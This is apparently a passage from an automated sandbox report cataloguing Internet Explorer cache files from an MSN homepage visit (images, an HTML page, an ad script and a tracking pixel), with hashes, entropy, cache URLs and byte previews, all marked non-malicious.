SHA-256:	4926EF7D16299D14D677A6A78FC169BDCC0EB8501E9A7A11C3E140AC3D1676A9
SHA-512:	A06AC4C937D51551FCF044315E8F1FC94A71ADA2E98F9C3E908D9BF57FC6A6F94E8D0C7A1908251FA8715CD2F25417500FE91CD7E674A09F4D3D4D55C6FDB0F1
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...#...#.x.?v....IDAT8Oc....P....1......_YX..>~.....\|...............}dee....w.. ..3g...5kiY...9..s.@W..XW.j...c$T....l.....wss...10..[6(+.........e..c....(ii..FF..P!.....x.g....o1FF.?......y..;...X......QM...?....N...."..;....E...m...3...R.ys^I.........\|...ATT8....@..--{. ....N&&F._....s......../.1..D.{..4...r.@G........jUU.?Pa..v..._../2...8.^..................................g%aa..G.l...2.....{:[VV....UXY.y~...z..>11I...._gbb....O.` ...........g.....i....X..!gA......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB14hq0P[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	14094
Entropy (8bit):	7.83310273984409
Encrypted:	false
SSDEEP:	384:PGmq+YNwicCF+frboNWKuPyPkXQkmEFq6:PGaIwVCF+jb3KuPSkLr
MD5:	F538E837D1D0AA3C0B57F8808A48EDD8
SHA1:	1974CE2A65C3AAD9B2CF4AF955CA2419D44000F3
SHA-256:	CA93774DA1D74DD0F183A83C7071B0FB47A52030F1F686014BCF4938F6573F88
SHA-512:	1677CF2B643034E23170EAC1E6CD8E7D5CB3689804CF538E19B8A370AD1AADE913BF2D311A9051E4BCB1D359B36ABD9DA33908344736874F49D60C02D0168E10
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..ii)h...(.h........Z(....JZ.)i(....(.......(.......(....J.i....G..KFk...U...w..XW.2.."\P.t.r..R..- .t.5..:...s!.A.%..9?..w.~..<..k....d'..d....'.0/\j.S.d5Q.w.4..z.".Xv!..z.;i..."\.+B5.t..;..0...g....U..E.sV].Q.3.Jm.J.c.5..@..^.j.I...f.&..E^....."..y.9KE.CUa!.5....$..)#m..n.Y....6.Z[e.y..i.........1I..}...(....qo..gDa.....%.....)\..Q..........hu....IR...Ai

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1cEP3G[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1299
Entropy (8bit):	7.779574269347441
Encrypted:	false
SSDEEP:	24:GUAKNADIM/zskEwE4V0l3eEioNMP+nlD4FieffNzVq26Xaf1dTPID2:GUAKGIbF4A3eEVNMmlYFXeUca
MD5:	71D136D931054F3CE43130B65E7A1823
SHA1:	71F6B8607D5042227537A9A16B3BE080CAADA863
SHA-256:	BEAB18C58700CB06E6654AA5B8F29C6EB4B1F8B6B526DB30192DC56A375C058E
SHA-512:	DD091270F2CC157093A4A1C5511173ED07AD4C544DA4669927B9FF0A7E6291184EDC5CA4E3A497838F2D33E3A240967589A8DCC74333DA16E6AC52AD93FECD9C
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d....IDATHK..{P.U....P`.]v.[`o,.e.AD.&p]tM..QF7 .j.).Ky.rR..1g..!#.VT..&.EA..&b.yGI4..).".....M....3...}.y.9..\|..[.D.s.P....J..J..%......0...Y.t...6.l..{[.WX.....2n...r...f..>...y...:....(&t.R..\..0....CQ...'..wJ..;...).`....0.....b..@.$..d..c..,9.?.....k.H$.z:.<.U2....\|.wKy..e2.3..o..$..-...<...@.DW..$.Z.O.\|....h.0.1%.E.>.E[...%.~(..(....!C.T.b.Bv./.^.+8....T..C..-.O.../..a.T......QjPj..).=......H&.bWZR ..~+.Jl{:....r...}.Y..,......6..6.....e...T.........+.ja..\N'K............DV..R.s`(..A..^.E.BY!..riY~O.p).>....Nq"k......C]@.j4A8......\..D....B.}n.j.Nd.C..gC#..E...NY......i.C.[..ZM..`..&'........h....0...V.[ ..r.@..6..h...9{..d..d4.....-..8.}.,.,7.p87.>7l.x'....q.kh........pP..?...;.c....KG}.T.b..pc..',........Q7j.N..6....U%..........1sp\|...K.....u...m@u..T._...KQc...c.gY...i_.*y-.M..?M^..LB.!}.U.n.k.].#._..%.e..5)B..(../.=.n.h.Y..@F.{...A..0\|\|J..`.E.k>..4.V.3

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1fnAAP[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	6790
Entropy (8bit):	7.772863870214574
Encrypted:	false
SSDEEP:	96:n6EKv8rhfayqPnlYe0ZlDT7JH65yj+HW95BX0YXDibgiTuXSxfJxp/0I6Mhk1F/G:6crSZ03R65yj99k+Diha8np/7hkHu
MD5:	C3D64B3E0B225D53C14FBCABEAF1B637
SHA1:	B931F7F651C49BE3D8FD260A4F8995183F514EF2
SHA-256:	323752A1B123FBDB2DE2AC02B40F2FFE5956CFE0898EC0362776DF654C239A5D
SHA-512:	87697BEA13B7D9FC283D68ED6DCF27C67DB3AFD93E81C1F9F57CAEBF8F9012488E6CE914610840CC6ED66977198E356F9692183DBA3D64D0245B868E6A8E8CEA
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnAAP.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=607&y=323
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:(.....P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.....4........$p9=).rq....9..4n....>.<..a......)a8'.......T..=j....Ui9S....R...a@..)......Z(...(...(...(...(...(...(...JZ(...(...N...(...(...(....RQ@.M4.......pBO\S3K...&.b.....?.I.[wz..G].:z......Jq.G......[...)..U.H.#...Nv..P.....ZkZ....#.V.@.x.#......1.d`p..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1fnB2f[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	16068
Entropy (8bit):	7.962426498410195
Encrypted:	false
SSDEEP:	192:6a7IU0lK+qL7ipQ24DYhMaz43TakHNiLjvWGLqM7acd4ZXmLIMhOZVQBu1JYEPGD:6a9DCpmJDukc3BTOcdiKRIwwJYE3IqE
MD5:	99AFDDD4D5F2AC8D0EAC0C72645D9CEE
SHA1:	787E9DF56F49B65C7BEEBEB9BE58532A07BA39F3
SHA-256:	7287C4504D26385F8CF2F0540CABB8F2CE3CD7160C26AA08EB7C91B68119AD8C
SHA-512:	10D2E862CF1FC4FCFCA2CCAF0406246DDD5961E701980DC169A1A4536102C1C75B624196C6A23167CEC149BBB9BDDA05AAA65676437C19CCA79389148AD4FDAF
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnB2f.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...j......cDOpi.[....6..DQ....P.0...Z\........>..p\.`..<.`9..H...2Y.V@.....1.Q...!...?...e.B) cE<.Z@..i....j3J...R...CSF(......N.)A....b.}.EIBQN.....5...&F.Uf.....x.k.S....q.ga..\|.Z.#6..]G...........?.Ui..$.I<.{......{Sb.)...z..ki...c....{.3r..]D..e).E.H..;...$...^MVn...rI.<./.T..aVH.SqR..P"f>....>...#<f..*......&....o..h...)0:.zf.L...;..=0...hI@.0.M...y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1fnEo6[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	24155
Entropy (8bit):	7.9363687494028685
Encrypted:	false
SSDEEP:	384:P7n7anA/yIxo6w4uVnUEn5gKq40ZHofiB6inuVr65x6FkZDftlBpuCmJbEgtH:PXaA/zXuVUEnKBQniA6f1ZDhUEE
MD5:	D5A1E71F797728932D972FC0B4F4C412
SHA1:	F0B976B19FA21B9B443C4A38C107CFB737DE064D
SHA-256:	5B287028DC9A79C0F1AC662E2563809299DC687C4D93E14CEE169D0FBB0336B1
SHA-512:	77790D08B95F4B45F51CCC671AD16514E4CC092765A93B4BDADAD75B88BE41487E5E2A41EAED5A8BEFD3E9F62F1300087E7286799778DB4EAD8FD136CB9A4802
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnEo6.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=542&y=427
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..3E74.........J(...4.f...3M..h...4.....3M..h..4...viA.f.4...i..4.f..f.4..Rf....ii..4.M8...m.....7....B(...R....R...).0.I.v(. .....(..R.\S........O..4.PZ..M4f...M1.....Fi)M!..........)w;Qz..P..RX.U....v.}h.R....(....)3I..\.IJ..:.IK@.E%&h....3@..%...QE....L.f..II.3@.Y.4......6.@:..K@.E%.....Z.Z\.ih.sK.m-..ii..4..)(..;4f..3@..&i3Fh.sFi..4..)3E.....P(....O......!^*

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1fnGwh[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	14056
Entropy (8bit):	7.940808530485487
Encrypted:	false
SSDEEP:	384:6YHgBrbW/nrVrCuvSi7Urgma1kmvJhZjeBgmz9fEDXQ:6YABryVbqi7qaioSemz9X
MD5:	537C49589E7A2D2C4B4B2B696579EDCA
SHA1:	734D50CCAE414A31808EF00921FE1BAFBA589800
SHA-256:	622C891D427CE8D9A6CE61D08A89F345C2E4F0069BC9A18DDC3BF4EE44D7EFFF
SHA-512:	13EEEE7CDDF9B55C2088BE9A8A8F258787D4E199F8C70F7F702B0C531EA35E5B1A4BAC3808F8762CD1B1D554BAEECCB04F17C7E0CA1E43BCEFA2CD0E5C2EDF9B
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnGwh.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..aN..0..(....(......KIK@..Q@..Q@..Q@..Q@..Q@..Q@.KE..QE..QE..S_.[}.:...}..eX.....&..\|U.@.....QE..QE..QE...-%-0.ZJZ.Z(....Q@.E...QE..QE..2N...T?i....I..;{g55..QE..R.@.E-..QE..QE..QE..S_.7.....eX......&..tU.@.(.AE.P.E.P.E.P.4....Z(....)i.QE..R.R..E.P.T5...n._.N*.g..:]...C......sq"..7Dd....].H.U.:....{.....0._8...._...G...QEH.(...(...(...(...(........=..eY....Z.g

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1fnMU5[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	15030
Entropy (8bit):	7.960744528554689
Encrypted:	false
SSDEEP:	384:6BhPwpAGlK3wa8cMVxbRZie4yAcqcOM3k6HLy:6BRwpVsg7cM/VQe7fqcOy3ry
MD5:	C95E798F0B09AB699D86C414496119D6
SHA1:	89A31611616F7F21B9814C5228EF1E7AB0FB9A17
SHA-256:	09A547D3AAA2CA6426C03D4B193DA0ACF8F4598CC240A2233DC232AC652CDF7B
SHA-512:	0F6799495B208EEFA12A671D0D143D2C3364CAF06DFDEC3CE07A8FA9DC67E1267E9CBE002B69898F76B368515FD6DD6BADFD69B08EAB33276419FE07CE4BEF80
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnMU5.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=699&y=213
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....k7...^.,.5..[q.vT.d...D.1.aem..ER...).v...o<...Ywf.)$b...C.[h......{U-KLHf..%F.}.MC...]...#.f.T.OA..._j...V.0../L.RA ]..;.]F...XYyW..8T.en..PqoV...k.w..z(.\.......F...Wi......*.q.%P....o.....2.9.f.6\|.{.;.7.d.V.L.q".".......zV....q}.e!..3.5.......D....a.'.9?v.!..H..."l.'\...'.2#4.o..7..kA.m.4.{...y......`....^.....a...w.......B!.M?SY...Ru.n,.w.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1fnO1z[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	downloaded
Size (bytes):	1881
Entropy (8bit):	7.7317103368719415
Encrypted:	false
SSDEEP:	24:zo0XxDuLHeOWXG4OZ7DAJuLHenX3FCPSlRNg+E0bl73gARjXsPtJomJXNZXZKjRK:cuERALCKi057JlQzZXZKN8Ilo9
MD5:	B8C0D359A081E4208C0A86C171F06378
SHA1:	F327E9B53D1E8CBBEC3FC5A638EA9B65E871D7C7
SHA-256:	B7E18928C35C1858DD31B81168EC9C560410D4A8FEF961F20D57039267B6CF0C
SHA-512:	BCC48B66E5EDEDDBBB2106796CFD5A3BA32BC202878E95D8723208D43FE47F465ED98FCE393B858228BB5626EB8604628B3A51EFE48420E924C86D8E80F3E827
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnO1z.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...\.QHB.AJ(.i..ih.p.u....).o...(..;.hB.V....QA'..Z.A.KB7l0Xf..dR...3....yH...@..1EF.qE@.%..tq.4.8...EQ....(h.R.A...G..".c.....N.$.^*y,........\|.7.hQ.Y..'.N.h......v....tU.....#...;y..l......(.}....W..N.q...x...A.j.b..\...2..l........`l05.m( ..,F.7.E@.......4.].o...i.O....J3uD.....b...}..Y.ka}...;w..G`.Oj.e.s.>...:.d[w.7.p.1...;..>k..,f....0.U.7.,....=z~5......Hn.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BB1kvzy[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1015
Entropy (8bit):	7.7367945648094025
Encrypted:	false
SSDEEP:	24:fPne8DHZHlihKEgrl73UBcaJ5X4dTYHvel2e:3nLD5xEgrlLecaJt4RYHvCt
MD5:	BA3A25334018E73A4C28A77CEA72B3E4
SHA1:	D9382F0C4F09066CB3F20BA8A8A45A9498860827
SHA-256:	C888CDF8F39D3788450F2739094C5A50910E12FA302B2F9910E0CBACFC91B277
SHA-512:	EC3ECE929E4CBFA85F1269C676E255EEE26A48573C1DDB51D70EEC3E306679F218C92FAE87F5E2A2C1CD6BE74D8903166C9720268A53B0160391C520007056AF
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kvzy.img?m=6&o=true&u=true&n=true&w=30&h=30
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK..h.Q....S~.....J...-?.h..VXm......l.-..l..0....4c...kc...{..]vm.o.;.........0..k.zz.y.s...<.9.R7..wD...54AM.o.....k.j..W.%a..r.4....n....$...].&..!.a..>Bx.kd.:b.`..k0Jl..6S.D/..b<.!\|..\..4.+i...yX.Dm...]..F.. .&n.p...S.p.L.?.......M..z.a...4QK;...`...R...`q.Fc._wQ..8..r.^C..@......mB0..c...O@.......Bv. 2....!...=.5...=(.I~.w.Qz.v.......^..<...s<..ST..A......#.c...h........B.f.=.8...f.5!.j4.yi ......S....M&.(.agA.N@...zz..Pd1....VX....../...l..m.....G.....>....222.......i...S..E}q]\|..p-..k.h-}.....\|..G.5?jj....\|\RR...........`.l.\.W.;..dC!..8.C......<.d...w.][[.....rNHH.c.t..6..F.+ r..gpOO.......<.o.5)K#..n^.6q]ZZ.........Chh.D%..C...QSB...=.F.4....M.{..j..^.Cv:.l......x855U....R.;.m4....M4r......o.g.......l.Z999Y^.....=..o..p8...)........DFF........qkk...?n..cbb..$%%e.\....(--../V2........."..!.3..d.4McYE....(.lG..._.xeVV....]i.X.m.H.......g)3".z

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	downloaded
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	426495
Entropy (8bit):	5.438881520314035
Encrypted:	false
SSDEEP:	3072:+fnCJUGxx+EPky8t/xYjpk97XIwvc2uvhA0pJvIlyN5qOI6KEX//P98weJALf:+fCHOEG7GvhAWIlsAT6j/X92J4
MD5:	14F679EE080801C3C3BB63EE1446B98C
SHA1:	A91E6C9897F3C3A42489987CEDE3F04F57E4B49B
SHA-256:	79C94301F8977DDEF233A4DF776E85EBAAAB5A760446E628B41D07D9310CEA7F
SHA-512:	60C5EBEE3A793C61E33CAAF4AA52045CB5519C1CD975BFCE87A5F1D00D9B48AD5D09D8EB221DC2460B6D96E1C0AB1EF5F2578707A78728837B18194AA89CD0C3
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210405_20004217;a:1080e718-23cd-4789-ab79-c6123d10bb96;cn:35;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 35, sn: neurope-prod-hp, dt: 2021-04-07T08:08:00.0338459Z, bt: 2021-04-05T14:19:55.1740937Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-03-30 19:10:53Z;xdmap:2021-04-07 09:54:03Z;axd:;f:msnallexpusers,muidflt26cf,muidflt51cf,muidflt315cf,moneyedge3cf,bingcollabedge2cf,platagyhp3cf,audexhp3cf,bingcollabhz1cf,artgly1cf,article5cf,onetrustpoplive,msnapp1cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,prg-hide-story-2;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps":1000,"bds":7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38319
Entropy (8bit):	5.066183344470142
Encrypted:	false
SSDEEP:	768:b1avn4u3hPPPW94hZ2CxSD1GvYXf9wOBEZn3SQN3GFl295oBlCHhB1lC7sU:BQn4uRfWmhZ/xKGvYXf9wOBEZn3SQN3w
MD5:	B5F60FA48BA31662591836C8A68ED365
SHA1:	3FBC5065F7F86AAEC8AED86CBFBF7F78919A957D
SHA-256:	62CF8ADE215A4ADE524B40A215DAFD23704BC509DC7907A919BA7D31A4EE33A3
SHA-512:	BAD43F53E0B17A2B0DACB06F071F8D7B41ABB41713C1727EC6571A9BFD52E9091588C41480865A9DD55E96689BC5D872109C60653E472C7BFCCDD6932641E963
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1617789374166597335&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1617789374166597335","s":{"_mNL2":{"size":"306x271","viComp":"1617782858725065133","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886781041","l2ac":"","sethcsd":"set!C11\|2198"},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1617789374166597335\")) \|\| (parent._mNDetails[\"locHash\"] && par

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\log[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	35
Entropy (8bit):	3.081640248790488
Encrypted:	false
SSDEEP:	3:CUnl/RCXknEn:/wknEn
MD5:	349909CE1E0BC971D452284590236B09
SHA1:	ADFC01F8A9DE68B9B27E6F98A68737C162167066
SHA-256:	796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
SHA-512:	18115C1109E5F6B67954A5FF697E33C57F749EF877D51AA01A669A218B73B479CFE4A4942E65E3A9C3E28AE6D8A467D07D137D47ECE072881001CA5F5736B9CC
Malicious:	false
Preview:	GIF89a.............,........@..L..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	388255
Entropy (8bit):	5.4843346287782575
Encrypted:	false
SSDEEP:	6144:4jh9Tdnf3vb+H0mPlnG3Zygz5PCu1bGcDr9dIV:M3v6pnG3ZygNxVVDpdIV
MD5:	5F339E75F3E4437A2F66369C9CEF92C5
SHA1:	30BC2C30A8BC9F3C6DD2D7DE9ED124180D758D25
